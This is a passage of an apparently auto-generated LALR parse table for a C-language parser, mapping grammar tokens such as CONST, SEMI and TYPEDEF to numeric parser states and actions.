MA':([0,14,16,17,19,25,38,45,47,59,61,97,99,119,123,124,180,181,184,185,186,188,189,190,191,223,284,285,286,289,291,298,300,301,302,303,305,307,308,313,315,318,332,424,425,428,429,432,435,437,438,439,440,446,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[61,-64,-60,-67,-66,-65,-63,-62,-70,61,-71,-335,61,-87,-61,-72,-73,61,61,61,61,-159,-160,-156,-336,-74,-76,-79,-82,-75,-77,61,-81,-215,-214,-80,-216,61,-78,61,61,-157,-69,-234,-233,-231,61,-217,-230,61,-84,-218,61,-158,-229,-232,-221,61,-83,-219,-68,61,-220,61,61,-225,-224,-222,-84,61,61,-226,-223,61,-228,-227,]),'INLINE':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[30,30,-113,-128,30,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,30,-120,-115,-65,-102,30,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,30,30,-119,30,-114,-130,30,-118,-71,-103,30,-131,-96,-98,30,-131,-95,-101,-97,-53,30,30,-88,30,-147,-335,-146,-167,-166,-100,-126,30,-87,-61,-72,30,-73,30,-89,-149,-336,-30,30,-74,-174,-175,30,-76,-79,-82,-75,-77,30,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,30,30,30,-234,-233,30,-231,-217,-230,-81,
-84,-218,-152,-150,-170,-169,-31,-34,30,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'INT_CONST_BIN':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,164,-335,-28,-182,-27,164,-337,-87,-72,-337,164,-286,-285,164,164,-283,-287,-288,164,-284,164,164,164,-336,-183,164,164,-28,-337,164,-28,-337,-337,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,164,-337,-76,-79,-82,-75,164,-77,164,164,-81,-215,-214,-80,-216,164,-78,164,164,-69,-284,164,164,-284,164,164,-244,-247,-245,-241,-242,-246,-248,164,-250,-251,-243,-249,-12,164,164,-11,164,164,164,164,-234,-233,164,-231,164,164,-217,164,-230,164,-84,-218,164,164,164,-337,-337,-198,164,164,164,-337,-284,-229,-232,164,-221,164,-83,-219,-68,164,-28,-337,164,-11,164,164,-220,164,164,164,-284,164,164,164,-337,164,-225,-224,-222,-84,164,164,164,-226,-223,164,-228,-227,]),'DO':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,307,-336,-76,-79,-82,-75,-77,307,-81,-215,-214,-80,-216,307,-78,-69,-234,-233,-231,307,-217,-230,307,-84,-218,307,-229,-232,-221,307,-83,-219,-68,307,-220,307,307,-225,-224,-222,-84,307,307,-226,-223,307,-228,-227,]),'LNOT':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,165,-335,-28,-182,-27,165,-337,-87,-72,-337,165,-286,-285,165,165,-283,-287,-288,165,-284,165,165,165,-336,-183,165,165,-28,-337,165,-28,-337,-337,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,165,-337,-76,-79,-82,-75,165,-77,165,165,-81,-215,-214,-80,-216,165,-78,165,165,-69,-284,165,165,-284,165,165,-244,-247,-245,-241,-242,-246,-248,165,-250,-251,-243,-249,-12,165,165,-11,165,165,165,165,-234,-233,165,-231,165,165,-217,165,-230,165,-84,-218,165,165,165,-337,-337,-198,165,165,165,-337,-284,-229,-232,165,-221,165,-83,-219,-68,165,-28,-337,165,-11,165,165,-220,165,165,165,-284,165,165,165,-337,165,-225,-224,-222,-84,165,165,165,-226,-223,165,-228,-227,]),'CONST':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,35,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68
,71,75,76,80,81,82,85,86,87,89,90,93,95,96,97,98,99,100,101,103,105,109,111,117,118,119,123,124,128,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,205,206,211,219,220,223,229,231,233,239,240,241,267,269,275,278,279,280,282,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,459,460,496,497,500,505,506,510,511,512,514,515,536,554,555,557,558,575,576,578,579,],[3,3,-113,-128,3,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,3,-120,-115,-65,-102,3,-131,-108,-238,-111,3,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,3,3,-119,3,-114,-130,3,-118,-71,-103,3,-131,-96,-98,3,-131,-95,-101,-97,3,-53,3,3,-88,3,3,-147,-335,-146,3,-167,-166,3,-182,-100,-126,3,3,-87,-61,-72,3,3,-144,-142,3,3,3,-73,3,-89,3,3,3,-149,-159,-160,-156,-336,3,-183,-30,3,3,3,3,3,-74,3,3,3,3,-174,-175,3,-143,-140,3,-141,-145,3,-76,-79,-82,-75,-77,3,-81,-215,-214,-80,-216,-78,-127,3,-153,3,-151,-148,-157,-168,-69,-36,-35,3,3,3,-234,-233,3,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,3,3,-229,-232,-221,-83,-219,-68,-33,-32,3,3,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'LSHIFT':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,244,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,244,-262,-260,244,244,244,-259,244,244,-257,-256,244,244,244,244,244,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'LOR':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,243,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'CHAR_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,167,-335,-28,-182,-27,167,-337,-87,-72,-337,167,-286,-285,167,167,-283,-287,-288,167,-284,167,167,167,-336,-183,167,167,-28,-337,167,-28,-337,-337,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,167,-337,-76,-79,-82,-75,167,-77,167,167,-81,-215,
-214,-80,-216,167,-78,167,167,-69,-284,167,167,-284,167,167,-244,-247,-245,-241,-242,-246,-248,167,-250,-251,-243,-249,-12,167,167,-11,167,167,167,167,-234,-233,167,-231,167,167,-217,167,-230,167,-84,-218,167,167,167,-337,-337,-198,167,167,167,-337,-284,-229,-232,167,-221,167,-83,-219,-68,167,-28,-337,167,-11,167,167,-220,167,167,167,-284,167,167,167,-337,167,-225,-224,-222,-84,167,167,167,-226,-223,167,-228,-227,]),'U16STRING_LITERAL':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,139,146,148,149,150,151,153,163,165,166,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,166,-335,-28,-182,-27,166,-337,-87,-72,-337,166,-286,-285,-330,166,-327,166,-283,-287,238,-328,-288,-329,166,-284,166,166,166,-336,-183,166,166,-28,-337,166,-28,-337,-337,166,166,166,-334,-332,-331,-333,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,166,-337,-76,-79,-82,-75,166,-77,166,166,-81,-215,-214,-80,-216,166,-78,166,166,-69,-284,166,166,-284,166,166,-244,-247,-245,-241,-242,-246,-248,166,-250,-251,-243,-249,-12,166,166,-11,166,166,166,166,-234,-233,166,-231,166,166,-217,166,-230,166,-84,-218,166,166,166,-337,-337,-198,166,166,166,-337,-284,-229,-232,166,-221,166,-83,-219,-68,166,-28,-337,166,-11,166,166,-220,166,166,166,-284,166,166,166,-337,166,-225,-224,-222,-84,166,166,166,-226,-223,166,-228,-227,]),'RBRACE':([61,97,99,119,124,132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,178,181,184,185,186,188,189,190,191,195,196,197,224,225,227,228,230,232,234,235,236,237,238,261,263,268,273,284,285,286,289,291,298,300,301,302,303,305,306,308,309,313,315,318,325,326,327,332,370,374,377,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,424,425,428,432,435,437,438,439,446,450,451,468,469,472,473,476,478,480,482,483,487,496,497,500,505,506,510,523,524,528,536,546,547,550,551,554,555,557,558,565,575,576,578,579,],[-71,-335,191,-87,-72,-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,-253,-328,-316,-329,-320,-276,-323,-312,-252,-337,191,191,191,-159,-160,-156,-336,-171,191,-176,-274,-239,-337,-193,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-76,-79,-82,-75,-77,-6,-81,-215,-214,-80,-216,-5,-78,191,191,191,-157,191,191,-172,-69,191,-22,-21,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,-292,-305,-234,-233,-231,-217,-230,-81,-84,-218,-158,-173,-177,-240,-194,191,-196,-237,-281,-282,-290,-291,-275,-229,-232,-221,-83,-219,-68,-195,-254,191,-220,-197,-306,191,-299,-225,-224,-222,-84,-300,-226,-223,-228,-227,]),'_BOOL':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177
,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[34,-337,-113,-128,34,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,34,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,34,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,34,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,34,-131,-95,-101,-97,34,-53,-126,34,-88,34,34,-93,34,-147,-335,-146,34,-167,-166,-182,-100,-126,34,-87,-90,-94,-92,-61,-72,34,-144,-142,34,34,34,-73,34,-89,34,34,34,-149,-159,-160,-156,-336,34,-183,-30,34,34,-74,34,34,34,34,-174,-175,34,-143,-140,34,-141,-145,-76,-79,-82,-75,-77,34,-81,-215,-214,-80,-216,-78,-127,34,-153,34,-151,-148,-157,-168,-69,-36,-35,34,34,34,-234,-233,34,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,34,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'LE':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,246,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,246,-262,-260,-264,246,-263,-259,-266,246,-257,-256,-265,246,246,246,246,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'SEMI':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,70,71,73,74,75,76,77,78,79,80,81,82,83,84,86,87,89,91,94,96,97,98,99,100,101,108,109,110,111,113,114,115,119,120,121,122,123,124,127,132,133,134,136,138,139,140,141,142,143,144,145,147,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,178,179,180,181,184,185,186,187,188,189,190,191,192,200,216,217,223,224,225,226,228,230,232,234,235,236,237,238,240,241,261,263,268,269,272,273,275,279,280,284,285,286,288,289,290,291,293,294,298,300,301,302,303,304,305,306,307,308,310,312,313,314,315,316,317,318,320,321,322,323,324,328,330,331,332,340,341,355,356,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,423,424,425,426,427,428,429,432,433,435,437,438,439,440,442,443,444,446,448,449,453,454,464,465,468,469,476,478,480,482,483,486,487,496,497,498,499,500,502,505,506,508,509,510,511,512,518,519,523,524,533,534,535,536,537,539,547,551,552,554,555,557,558,565,568,569,574,575,576,577,578,579,],[19,-337,-113,-128,-337,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,-337,-29,-121,-116,-62,-112,-70,-52,-123,-117,119,-337,-337,-119,-337,-114,-130,19,-118,-71,-103,-337,-9,-131,-91,-10,-96,-20,-98,-54,-179,-178,-131,-37,-134,-85,-95,-101,-97,-19,-132,-53,-126,-337,-337,-93,-147,-335,-146,188,-167,-166,-136,-100,-138,-126,-16,-86,-15,-87,-90,-94,-92,-61,-72,-55,-317,-321,-318,-303,-324,-330,-313,-319,-144,-301,-274,-314,-142,-327,-325,-304,-322,-302,-255,-315,-289,-253,-328,-316,-329,-320,-276,-323,-312,-252,-178,-73,-337,188,188,188,-149,-1
59,-160,-156,-336,-337,-30,-38,-133,-74,-274,-239,-135,-193,-326,-280,-277,-334,-332,-331,-333,-174,-175,-298,-297,-279,-143,-235,-278,-140,-141,-145,-76,-79,-82,424,-75,425,-77,428,-14,-337,-81,-215,-214,-80,435,-216,-13,-337,-78,-312,-127,188,-153,188,-151,-148,-157,-26,-25,446,-161,-163,-168,-139,-137,-69,-36,-35,-44,-43,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,-292,-305,496,-234,-233,497,-337,-231,-337,-217,-13,-230,-81,-84,-218,-337,-152,-150,-165,-158,-170,-169,-31,-34,-39,-42,-240,-194,-237,-281,-282,-290,-291,-236,-275,-229,-232,533,-337,-221,-337,-83,-219,-162,-164,-68,-33,-32,-41,-40,-195,-254,-337,553,-337,-220,-337,-337,-306,-299,566,-225,-224,-222,-84,-300,575,-337,-337,-226,-223,-337,-228,-227,]),'_THREAD_LOCAL':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[11,11,-113,-128,11,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,11,-120,-115,-65,-102,11,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,11,11,-119,11,-114,-130,11,-118,-71,-103,11,-131,-96,-98,11,-131,-95,-101,-97,-53,11,11,-88,11,-147,-335,-146,-167,-166,-100,-126,11,-87,-61,-72,11,-73,11,-89,-149,-336,-30,11,-74,-174,-175,11,-76,-79,-82,-75,-77,11,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,11,11,11,-234,-233,11,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-31,-34,11,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'LT':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,248,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,248,-262,-260,-264,248,-263,-259,-266,248,-257,-256,-265,248,248,248,248,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'COMMA':([2,3,5,6,7,10,11,12,13,18,20,22,23,26,27,30,33,34,35,36,39,42,43,44,46,48,49,50,54,56,58,60,62,68,70,71,73,74,75,76,77,78,80,81,82,84,86,96,98,100,101,103,104,105,106,108,109,110,111,113,127,132,133,134,136,138,139,140,141,142,143,144,145,147,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,177,178,179,187,191,195,196,197,198,199,200,203,210,211,212,213,215,216,217,224,225,226,228,230,232,234,235,236,237,238,240,241,261,263,268,269,270,272,273,274,275,276,277,279,280,281,283,294,310,312,314,316,317,320,323,324,325,326,327,328,330,331,340,341,343,344,345,346,347,348,355,356,374,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,414,426,442,443,444,448,449,450,451,453,454,458,461,463,464,465,468,469,473,476,478,480,482,483,486,487,489,490,492,501,503,507,508,509,511,512,518,519,523,524,525,528,529,530,531,532,544,545,546,547,551,556,559,560,564,565,570,571,],[-113
,-128,-124,-110,-106,-104,-107,-125,-105,-99,-109,-120,-115,-102,-126,-108,-238,-111,-337,-122,-129,-29,-121,-116,-112,-52,-123,-117,-119,-114,-130,-118,-103,-96,126,-98,-54,-179,-178,-131,-37,-134,-95,-101,-97,-132,-53,-147,-146,-167,-166,-28,-180,-182,-27,-136,-100,-138,-126,202,-55,-317,-321,-318,-303,-324,-330,-313,-319,-144,-301,-274,-314,-142,-327,-325,-304,-322,-302,-255,-315,-289,-253,-328,-316,-329,-320,-276,-323,-312,-337,-252,-178,-149,-336,-171,327,-176,-183,-181,-30,333,-186,-337,349,350,-191,-38,-133,-274,-239,-135,-193,-326,-280,-277,-334,-332,-331,-333,-174,-175,-298,-297,-279,-143,412,-235,-278,-203,-140,-204,-1,-141,-145,-2,-206,412,-312,-127,-153,-151,-148,445,-161,-163,327,327,-172,-168,-139,-137,-36,-35,-190,-204,-56,-188,-45,-189,-44,-43,472,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,412,-270,-258,-296,-295,-294,-293,412,-292,-310,484,485,-305,-205,412,-152,-150,-165,-170,-169,-173,-177,-31,-34,-57,-192,-187,-39,-42,-240,-194,-196,-237,-281,-282,-290,-291,-236,-275,-213,-207,-211,412,412,412,-162,-164,-33,-32,-41,-40,-195,-254,-311,550,-209,-208,-210,-212,-51,-50,-197,-306,-299,412,-46,-49,412,-300,-48,-47,]),'U16CHAR_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,169,-335,-28,-182,-27,169,-337,-87,-72,-337,169,-286,-285,169,169,-283,-287,-288,169,-284,169,169,169,-336,-183,169,169,-28,-337,169,-28,-337,-337,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,169,-337,-76,-79,-82,-75,169,-77,169,169,-81,-215,-214,-80,-216,169,-78,169,169,-69,-284,169,169,-284,169,169,-244,-247,-245,-241,-242,-246,-248,169,-250,-251,-243,-249,-12,169,169,-11,169,169,169,169,-234,-233,169,-231,169,169,-217,169,-230,169,-84,-218,169,169,169,-337,-337,-198,169,169,169,-337,-284,-229,-232,169,-221,169,-83,-219,-68,169,-28,-337,169,-11,169,169,-220,169,169,169,-284,169,169,169,-337,169,-225,-224,-222,-84,169,169,169,-226,-223,169,-228,-227,]),'OFFSETOF':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,170,-335,-28,-182,-27,170,-337,-87,-72,-337,170,-286,-285,170,170,-283,-287,-288,170,-284,170,170,170,-336,-183,170,170,-28,-337,170,-28,-337,-337,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,170,-337,-76,-79
,-82,-75,170,-77,170,170,-81,-215,-214,-80,-216,170,-78,170,170,-69,-284,170,170,-284,170,170,-244,-247,-245,-241,-242,-246,-248,170,-250,-251,-243,-249,-12,170,170,-11,170,170,170,170,-234,-233,170,-231,170,170,-217,170,-230,170,-84,-218,170,170,170,-337,-337,-198,170,170,170,-337,-284,-229,-232,170,-221,170,-83,-219,-68,170,-28,-337,170,-11,170,170,-220,170,170,170,-284,170,170,170,-337,170,-225,-224,-222,-84,170,170,170,-226,-223,170,-228,-227,]),'_ATOMIC':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,35,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,103,105,109,111,117,118,119,120,121,122,123,124,128,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,205,206,211,214,219,220,223,229,231,233,239,240,241,267,269,275,278,279,280,282,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,459,460,496,497,500,505,506,510,511,512,514,515,536,554,555,557,558,575,576,578,579,],[29,65,-113,-128,76,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,65,-120,-115,-65,-102,65,-131,-108,-238,-111,76,-122,-63,-129,112,-29,-121,-116,-62,-112,-70,-52,-123,-117,65,65,-119,65,-114,-130,29,-118,-71,-103,65,-9,-131,-91,-10,-96,-98,65,-131,-95,-101,-97,29,-53,65,76,-88,112,65,-93,29,-147,-335,-146,29,-167,-166,76,-182,-100,-126,76,29,-87,-90,-94,-92,-61,-72,76,29,-144,-142,65,29,76,-73,65,-89,29,29,29,-149,-159,-160,-156,-336,76,-183,-30,76,76,76,112,76,76,-74,29,29,29,29,-174,-175,29,-143,-140,29,-141,-145,76,-76,-79,-82,-75,-77,65,-81,-215,-214,-80,-216,-78,-127,29,-153,29,-151,-148,-157,-168,-69,-36,-35,29,29,29,-234,-233,65,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,76,29,-229,-232,-221,-83,-219,-68,-33,-32,76,76,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'TYPEDEF':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,65,68,71,75,76,80,81,82,86,87,89,90,93,96,97,98,100,101,109,111,118,119,123,124,129,180,181,182,187,191,200,211,223,240,241,278,284,285,286,289,291,298,300,301,302,303,305,308,312,314,316,317,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[7,7,-113,-128,7,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,7,-120,-115,-65,-102,7,-131,-108,-238,-111,-122,-63,-129,-29,-121,-116,-62,-112,-70,-52,-123,-117,7,7,-119,7,-114,-130,7,-118,-71,-103,7,-131,-96,-98,7,-131,-95,-101,-97,-53,7,7,-88,7,-147,-335,-146,-167,-166,-100,-126,7,-87,-61,-72,7,-73,7,-89,-149,-336,-30,7,-74,-174,-175,7,-76,-79,-82,-75,-77,7,-81,-215,-214,-80,-216,-78,-127,-153,-151,-148,-168,-69,-36,-35,7,7,7,-234,-233,7,-231,-217,-230,-81,-84,-218,-152,-150,-170,-169,-